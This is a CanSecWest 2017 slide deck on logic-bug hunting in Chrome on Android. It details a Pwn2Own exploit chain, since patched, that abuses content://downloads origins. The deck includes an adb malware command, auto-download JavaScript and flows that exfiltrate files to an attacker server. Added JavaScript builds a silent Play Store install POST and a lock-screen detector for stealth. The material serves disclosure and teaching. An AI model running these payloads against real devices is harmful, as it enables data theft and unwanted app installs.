Logic Bug Hunting in Chrome on Android
CanSecWest 2017 (March 2017)
Agenda
• Fuzzing and memory corruptions
• Introduction to logic flaws
• General approach to hunting logic bugs
• Application in Mobile Pwn2Own 2016
• Exploit improvement
Tindroductions
Fuzzing and Pwn2Own
• Fuzzing has become mainstream
  • AFL, LibFuzzer, Radamsa, Honggfuzz, etc.
• It’s almost too easy…
• People find and kill bugs they rarely understand…
• Increasing likelihood of duplicates
  • libstagefright, Chrome, etc.
• Code changes
• Improved exploit mitigations
Android Mitigations
• More and better security mechanisms
  • Improved rights management, SELinux, TrustZone
  • ASLR, DEP, PIE, RELRO, PartitionAlloc, improved GC
• Significant increase in exploit development time
  • Multiple bugs are usually chained together
• PoC isn’t enough for the competition
• We can’t afford spending too much time on Pwn2Own
Memory Corruptions vs. Logic Flaws
• Memory corruptions
  • Programming errors
  • Memory safety violations
  • Architecture-dependent
  • General mitigations exist
• Logic flaws
  • Design vulnerabilities
  • Intended behaviour: the code does exactly what it was written to do
  • Architecture-agnostic
  • No general mitigation mechanisms
We Love Logic Bugs
• Equally beautiful and hilarious vectors
• Basic tools
• Actual exploits might be somewhat convoluted
Q: How many bugs do you have in your chain?
A: We abuse one and a half features.
Q: What tool did you use to find that bug?
A: Notepad.
It’s not just us…
Identifying Logic Flaws
• I don’t know what I’m doing…
• Lack of one-size-fits-all methodology
• Thou shalt know thy target
• Less known or obscure features
• Trust boundaries and boundary violations
• Threat modelling
Mobile Pwn2Own 2016
Mobile Pwn2Own 2016
“All entries must compromise the devices by browsing to web content […] or by viewing/receiving an MMS/SMS message.” (http://zerodayinitiative.com/MobilePwn2Own2016Rules.html)
| Category                        | Phone          | Prize (USD) |
|---------------------------------|----------------|-------------|
| Obtaining Sensitive Information | Apple iPhone   | $50,000     |
|                                 | Google Nexus   | $50,000     |
|                                 | Samsung Galaxy | $35,000     |
| Install Rogue Application       | Apple iPhone   | $125,000    |
|                                 | Google Nexus   | $100,000    |
|                                 | Samsung Galaxy | $60,000     |
| Force Phone Unlock              | Apple iPhone   | $250,000    |
Where do we start?
• Ruling out SMS/MMS
  • Limited to media rendering bugs
• Chrome
  • Core components
  • URI handlers
  • IPC to other applications
Google Admin
• Case study from 2015
Google Admin
<activity android:name="com.google.android.apps.
enterprise.cpanel.activities.ResetPinActivity">
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:host="localhost" android:scheme="http"/>
</intent-filter>
</activity>
AndroidManifest.xml
Google Admin
public void onCreate(Bundle arg3) {
    // "setup_url" is an intent extra: whoever starts this BROWSABLE activity
    // (any app, or a browser following an http://localhost link) controls it,
    // and it is loaded straight into the activity's WebView.
    this.c = this.getIntent().getExtras().getString("setup_url");
    this.b.loadUrl(this.c);
    // ...
}
ResetPinActivity.java (decompiled)
Google Admin
• Attacking with malware
adb shell am start \
  -d http://localhost/foo \
  -e setup_url file:////data/data/com.malware/file.html
Google Admin
Chrome, loading file:///tmp/foo.html:
<HTML><BODY>
<IFRAME SRC="file:///tmp/foo.html" id="foo"
onLoad="console.log(document.getElementById('foo').contentDocument.body.innerHTML);">
</IFRAME>
</BODY></HTML>
Result: Uncaught DOMException: Blocked a frame with origin "null" from accessing a cross-origin frame.
Google Admin
Chrome on Android (API 17), loading file:///sdcard/foo.html:
<HTML><BODY>
<IFRAME SRC="file:///sdcard/foo.html" id="foo"
onLoad="console.log(document.getElementById('foo').contentDocument.body.innerHTML);">
</IFRAME>
</BODY></HTML>
Result: yep, that’s fine! The framed document’s contents are logged.
Google Admin
• Malicious app creates a world-readable file, e.g. foo.html
• foo.html loads an iframe with src="foo.html" after a small delay
• Malicious app sends a URL for foo.html to Google Admin via IPC (the setup_url extra)
• During the delay, foo.html is replaced by a symbolic link pointing to a file in Google Admin’s private data directory
• The iframe now loads that file under the same file: origin, and its contents are posted back to a web server
Same-Origin Policy
• Chrome for Android vs. Chrome
  • Different SOP
  • Custom Android schemes
• Worth investigating…
SOP in Chrome for Android
| Scheme       | Origin rule |
|--------------|-------------|
| HTTP / HTTPS | Scheme, domain and port number must match. |
| FILE         | The full file path is the origin until API 23. Starting with API 24, all file origins are NULL. |
| CONTENT      | Scheme, domain (the content provider authority) and port number must match. |
| DATA         | All origins are NULL. |
Jumping Origins
Can a page in the source scheme (rows) navigate to a URL in the destination scheme (columns)?
| Source \ Destination | HTTP / HTTPS | FILE | CONTENT | DATA |
|----------------------|--------------|------|---------|------|
| HTTP / HTTPS         | ✓            | ✘    | ✓       | ✓    |
| FILE                 | ✓            | ✓    | ✓       | ✓    |
| CONTENT              | ✓            | ✘    | ✓       | ✓    |
| DATA                 | ✓            | ✘    | ✓       | ✓    |
Android Content Providers
• Implement data repositories
• Exportable for external access
• Declared in AndroidManifest.xml
• Read and write access control
• Content URIs
  • Combination of ‘authority’ and ‘path’
  • content://<authority><path>
  • content://downloads/my_downloads/45
• What about SOP?
Android Download Manager
• System service that handles long-running HTTP downloads
• Exposes completed downloads through a content provider under the downloads authority
• Back to SOP… every row below shares scheme and authority, so Chrome treats them all as one origin:
content://downloads/my_downloads/45
content://downloads/my_downloads/46
content://downloads/my_downloads/102
Automatic File Downloads
• Thank you, HTML5!
  • Confirmed to work in Chrome
  • <a href="foo.html" download>
  • <a href="foo.html" download="bar.html">
• Zero user interaction
  • Link click using JavaScript
• Perfect for Pwn2Own
Automatic File Downloads
<a id='foo' href='evil.html' download> link </a>
<script>
document.getElementById('foo').click();
</script>
Exploit #1 – Stealing Downloaded Files
Parties: attacker’s web server, victim’s browser (Chrome), Android Download Manager.
1. Browser → attacker: GET /index.html; the attacker returns index.html (the page at https://attacker.com/index.html).
2. Browser → attacker: GET /evil.html; the response is served as a download, so the Android Download Manager stores evil.html.
3. Browser opens content://downloads/my_downloads/54 (GET my_downloads/54 to the Download Manager returns evil.html), so evil.html now runs in the content://downloads origin.
4. evil.html → Download Manager: GET my_downloads/53 returns the victim’s earlier download, secrets.pdf; same scheme and authority, so the SOP allows the read.
5. evil.html → attacker: secrets.pdf is sent to the attacker’s web server.
Mobile Pwn2Own 2016
Exploit Enhancement
• Downloading arbitrary files
  • User sessions: the download request carries the victim’s cookies, so authenticated pages can be fetched
<a id='foo' href='https://drive.google.com/my_drive.html' download> link </a>
<script>
document.getElementById('foo').click();
</script>
Multiple File Downloads
• Multiple automatic downloads from the same page are forbidden
Multiple File Downloads Restriction Bypass
• However…
page1.html (the page that triggers a download):
<meta http-equiv="refresh" content="0; url=page2.html" />
page2.html:
<script>
window.history.back();
</script>
Exploit #2 – Stealing Google Drive Files
Parties: attacker’s web server, Google Drive web server, victim’s browser, Android Download Manager.
1. Browser downloads evil.html from the attacker; the Download Manager stores it and the browser opens it as content://downloads/my_downloads/54 (GET my_downloads/54 returns evil.html).
2. evil.html → Google Drive: GET /my_drive.html with the victim’s session; the response is saved as a download, my_drive.html.
3. evil.html → attacker: GET /bounce.html; bounce.html runs history.back(), which returns to content://downloads/my_downloads/54 and lets evil.html trigger the next download.
4. evil.html → Download Manager: GET my_downloads/55 returns the saved my_drive.html, which lists the victim’s files.
5. evil.html → Google Drive: GET /img?id=12345678; the file is saved as a download, img_foo.jpg (same bounce through /bounce.html and history.back()).
6. evil.html → Download Manager: GET my_downloads/56 returns the downloaded img_foo.jpg.
7. evil.html → attacker: POST /exfiltrate with the stolen content.
MALCONTENT (ASCII-art banner)
Drive Files Download Demo
Mobile Pwn2Own 2016
Bettererer Exploit
• We can also make POST requests
• Download pages containing a CSRF token
• Use the CSRF token in a POST request
• We’ve got everything now…
Exploit #3 – Install APK from Play Store
• Grab a CSRF token
  https://play.google.com/store
• Grab victim’s device ID
  https://play.google.com/settings
• Install APK via POST request using CSRF token and device ID

Token in the downloaded store page:
function(){window._uc='[\x22Kx1pa-cDQOe_1C6Q0J2ixtQT22:1477462478689\x22, \x220\x22, \x22en\x22,\x22GB\x22,

Device ID in the downloaded settings page:
<tr class="excPab-rAew03" id="g1921daaeef107b4" data-device-id="g1921daaeef107b4" data-nickname="" data-visible="true" jsname="fscTHd">

POST body to https://play.google.com/store/install?authuser=0:
id=com.mylittlepony.game&device=g1921daaeef107b4&token=Ka1pa-dDQOe_1C6Q0J2ixtQT32:1477462478689
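The token and device-ID scrape from the fragments above, as an added example that is not the presenters' code. The two page formats mirror the fragments on the slide; the sample pages are constructed here in that shape, `prepareInstall`, `submitInstall` and the package name com.example.app are this example's own, and the install endpoint is assumed to accept exactly the three parameters shown on the slide.

```javascript
// Added example, not code from the slides or the presenters: scrape the CSRF
// token from a downloaded copy of https://play.google.com/store and the
// device id from a downloaded copy of https://play.google.com/settings, then
// build the body of the install request. The two page formats mirror the
// fragments on the slide; the sample pages below are constructed, the
// function names and com.example.app are this example's own, and the install
// endpoint is assumed to accept exactly the three parameters the slide shows.

// The store page embeds a JS array literal in window._uc with \x22 escapes:
//   window._uc='[\x22<token>\x22, \x220\x22, \x22en\x22, ...
function extractCsrfToken(storeHtml) {
  const m = /window\._uc='\[\\x22([^\\']+)\\x22/.exec(storeHtml);
  return m ? m[1] : null;
}

// The settings page lists devices as <tr ... data-device-id="..."> rows; the
// attribute value can wrap across lines, so allow whitespace around it.
function extractDeviceIds(settingsHtml) {
  const ids = [];
  const re = /data-device-id="\s*([A-Za-z0-9]+)\s*"/g;
  let m;
  while ((m = re.exec(settingsHtml)) !== null) ids.push(m[1]);
  return ids;
}

// application/x-www-form-urlencoded body for POST /store/install?authuser=0
function buildInstallBody(packageName, deviceId, token) {
  const p = new URLSearchParams();
  p.set('id', packageName);
  p.set('device', deviceId);
  p.set('token', token);
  return p.toString();
}

// Given the two downloaded pages, return everything the POST needs, or throw
// so the exploit never fires with a missing token or device (a blind POST
// would only burn the session).
function prepareInstall(storeHtml, settingsHtml, packageName) {
  const token = extractCsrfToken(storeHtml);
  const devices = extractDeviceIds(settingsHtml);
  if (!token) throw new Error('CSRF token not found in store page');
  if (devices.length === 0) throw new Error('no device id in settings page');
  return {
    url: 'https://play.google.com/store/install?authuser=0',
    deviceId: devices[0],
    token,
    body: buildInstallBody(packageName, devices[0], token),
  };
}

// Browser-only: send the request as a plain form POST (the slides report that
// AJAX crashed the competition build, so a form is the reliable transport).
function submitInstall(plan) {
  const form = document.createElement('form');
  form.method = 'POST';
  form.action = plan.url;
  for (const [name, value] of new URLSearchParams(plan.body)) {
    const input = document.createElement('input');
    input.type = 'hidden';
    input.name = name;
    input.value = value;
    form.appendChild(input);
  }
  document.body.appendChild(form);
  form.submit();
}

// Constructed samples in the same shape as the slide fragments.
const SAMPLE_STORE_HTML =
  "<script>function(){window._uc='[\\x22Kx1pa-cDQOe_1C6Q0J2ixtQT22:1477462478689\\x22," +
  " \\x220\\x22, \\x22en\\x22,\\x22GB\\x22,'</script>";
const SAMPLE_SETTINGS_HTML =
  '<tr class="excPab-rAew03" id="g1921daaeef107b4" data-device-id="\n' +
  'g1921daaeef107b4" data-nickname="" data-visible="true" jsname="fscTHd">';

if (typeof document === 'undefined') {
  console.log(prepareInstall(SAMPLE_STORE_HTML, SAMPLE_SETTINGS_HTML, 'com.example.app'));
}
```

In the browser the two pages come out of their content://downloads rows (same origin as the running evil.html), `prepareInstall` is applied to them, and `submitInstall` posts the form; the cross-site form POST carries the victim's Play session cookies, which is what turns a scraped token into a remote install.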
Exploit #3 – Install APK from Play Store
Parties: attacker’s web server, Google Play web server, victim’s browser, Android Download Manager.
1. Browser downloads evil.html from the attacker and opens it as content://downloads/my_downloads/54.
2. evil.html → Google Play: GET /store.html (https://play.google.com/store) with the victim’s session; saved as a download, store.html, which contains the CSRF token.
3. evil.html → attacker: GET /bounce.html; bounce.html runs history.back() to return to content://downloads/my_downloads/54 for the next download.
4. evil.html → Google Play: GET /settings.html (https://play.google.com/settings); saved as a download, settings.html, which contains the device ID.
5. evil.html → Download Manager: GET my_downloads/55 returns store.html; GET my_downloads/56 returns settings.html.
6. evil.html → Google Play: POST /install with the CSRF token and device ID; Play pushes the chosen APK to the victim’s device.
Mobile Pwn2Own 2016

Page 63
Keep calm and… aw, snap!
• Pending Chrome update?!
  • Automatic updates failed us
• Segmentation fault from AJAX requests
  • Never had time to investigate
• Can still use HTML forms to POST back
  • Absolute mess compared to AJAX

Page 64
Where did this bug feature come from?

Page 65
Exploit Improvement
• Removing Pwn2Own debugging
• Completely removing AJAX
• Moving the bulk of the logic off to the agent
  • Intelligent agent
• Less C&C traffic
• Hiding malicious activities from the user

Page 66
Changing Focus
• Prompt for redirecting to another application
  • Media players, PDF readers and other applications
  • <a href='rtsp://sexy.time.gov.uk/cam1'>Click me!</a>
• In-focus test in JavaScript
  • document.hidden == true

Page 67
Toasts
• Small popups at the bottom of the screen
• Automatic file downloads
  • “Downloading…”

Page 68
Fasterer and Stealthierer

Page 69
Going Further
• Wait for the screen to get locked?
• JS is slightly delayed when the browser isn't in focus or the lock screen is activated
  • Loop a JS function every 100 ms
  • Test the time passed since the last function call
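The in-focus and lock-screen heuristic from the "Changing Focus" and "Going Further" slides, as an added example that is not the authors' code: a 100 ms interval records the gap between consecutive calls, and gaps far above the period indicate the browser is throttling the timer because the tab is hidden, minimised or the device is locked. The 100 ms period, the 5x threshold and the 20-sample window are assumptions chosen for illustration.

```javascript
// Added example, not the authors' code. Assumptions: a 100 ms period, a 5x
// threshold and a 20-sample window; Chrome throttles timers in hidden tabs,
// so gaps between calls grow well beyond the requested period.
const PERIOD_MS = 100;

// Classify the gaps (ms) between consecutive timer callbacks. A gap far above
// the period means the callback was delayed, which happens when the tab is
// hidden, the browser is minimised or the device is locked. A majority vote
// over the window keeps a single scheduling hiccup from flipping the verdict.
function classifyGaps(gaps, periodMs = PERIOD_MS, factor = 5) {
  const delayed = gaps.filter((g) => g > periodMs * factor).length;
  const background = gaps.length > 0 && delayed * 2 >= gaps.length;
  return { state: background ? 'background' : 'foreground', delayed, total: gaps.length };
}

// Records the timestamp of each tick and keeps the last `windowSize` gaps.
// In a browser it drives itself with setInterval; tick(now) can also be called
// directly, which is how the offline test feeds it constructed timestamps.
class FocusMonitor {
  constructor(periodMs = PERIOD_MS, windowSize = 20) {
    this.periodMs = periodMs;
    this.windowSize = windowSize;
    this.gaps = [];
    this.last = null;
    this.timer = null;
  }
  tick(now) {
    if (this.last !== null) {
      this.gaps.push(now - this.last);
      if (this.gaps.length > this.windowSize) this.gaps.shift();
    }
    this.last = now;
  }
  // Page Visibility API check from the "Changing Focus" slide; null outside a browser.
  hidden() {
    return typeof document === 'undefined' ? null : document.hidden === true;
  }
  start() {
    this.timer = setInterval(() => this.tick(Date.now()), this.periodMs);
  }
  stop() {
    clearInterval(this.timer);
    this.timer = null;
  }
  // Both signals together: the visibility flag and the timer-drift verdict.
  state() {
    return { ...classifyGaps(this.gaps, this.periodMs), hidden: this.hidden() };
  }
}
```

In a browser, `new FocusMonitor().start()` runs the loop and `state()` reports the current verdict; the measured gaps are the kind of data the "How realistic is this?" charts plot for the minimised and locked cases.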

Pages 70–71
How realistic is this?
(Chart, built up over two slides; y-axis ticks 700 to 1100; series: Minimised, then Minimised and Locked.)

Page 72
The Patch
• CVE-2016-5196
• Chromium Bug ID 659492
• The content:// scheme is now a local scheme
  • Similar to the file:// scheme
• Cannot redirect from http:// to content://
• Cannot read other content:// files

Page 73
Conclusion
• Hunting logic flaws can be rewarding
• Outside-the-box thinking
• Creativity exercise